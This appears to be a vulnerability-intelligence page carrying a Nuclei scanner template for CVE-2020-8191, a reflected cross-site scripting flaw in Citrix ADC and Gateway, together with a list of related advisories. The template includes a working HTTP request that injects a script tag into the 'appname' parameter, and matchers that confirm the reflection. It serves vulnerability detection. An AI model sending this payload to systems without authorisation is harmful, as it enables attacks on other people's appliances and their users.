Citrix ADC/Gateway - XSS vulnerability pre 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 & 10.5-70.18 & Citrix SDWAN WAN-OP pre 11.1.1a, 11.0.3d & 10.2.
Reporter | Title | Published | Views | Family All 10 |
---|---|---|---|---|
![]() | CVE-2020-8191 | 10 Jul 202015:38 | – | cvelist |
![]() | CVE-2020-8191 | 10 Jul 202016:15 | – | cve |
![]() | CVE-2020-8191 | 10 Jul 202016:15 | – | nvd |
![]() | Citrix ADC Reflected Cross Site Scripting (CVE-2020-8191) | 27 Jul 202000:00 | – | checkpoint_advisories |
![]() | Cross site scripting | 10 Jul 202016:15 | – | prion |
![]() | Citrix SD-WAN WANOP 10.2.x Multiple Vulnerabilities (CTX276688) | 2 Sep 202000:00 | – | nessus |
![]() | Citrix ADC and Citrix NetScaler Gateway Multiple Vulnerabilities (CTX276688) | 8 Jul 202000:00 | – | nessus |
![]() | CTX276688: Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update | 9 Jul 202000:00 | – | attackerkb |
![]() | Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update | 7 Jul 202004:00 | – | citrix |
![]() | Citrix Bugs Allow Unauthenticated Code Injection, Data Theft | 7 Jul 202014:44 | – | threatpost |
id: CVE-2020-8191
info:
name: Citrix ADC/Gateway - Cross-Site Scripting
author: dwisiswant0
severity: medium
description: |
Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.
reference:
- https://support.citrix.com/article/CTX276688
- https://nvd.nist.gov/vuln/detail/CVE-2020-8191
- https://github.com/Elsfa7-110/kenzer-templates
- https://github.com/jweny/pocassistdb
- https://github.com/stratosphereips/nist-cve-search-tool
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-8191
cwe-id: CWE-79
epss-score: 0.0021
epss-percentile: 0.58946
cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: citrix
product: application_delivery_controller_firmware
tags: cve,cve2020,citrix,xss
http:
- raw:
- |
POST /menu/stapp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-NITRO-USER: xpyZxwy6
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</title><script>alert(31337)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a0046304402206b57bfe37e77b25dd03abf9494377ca1071ce1076daef63cb70545464f487f0302205029c0f944a0b3a535987c1ce262bc3bcf5c2b88fb38f0ea1610f562bd693115:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo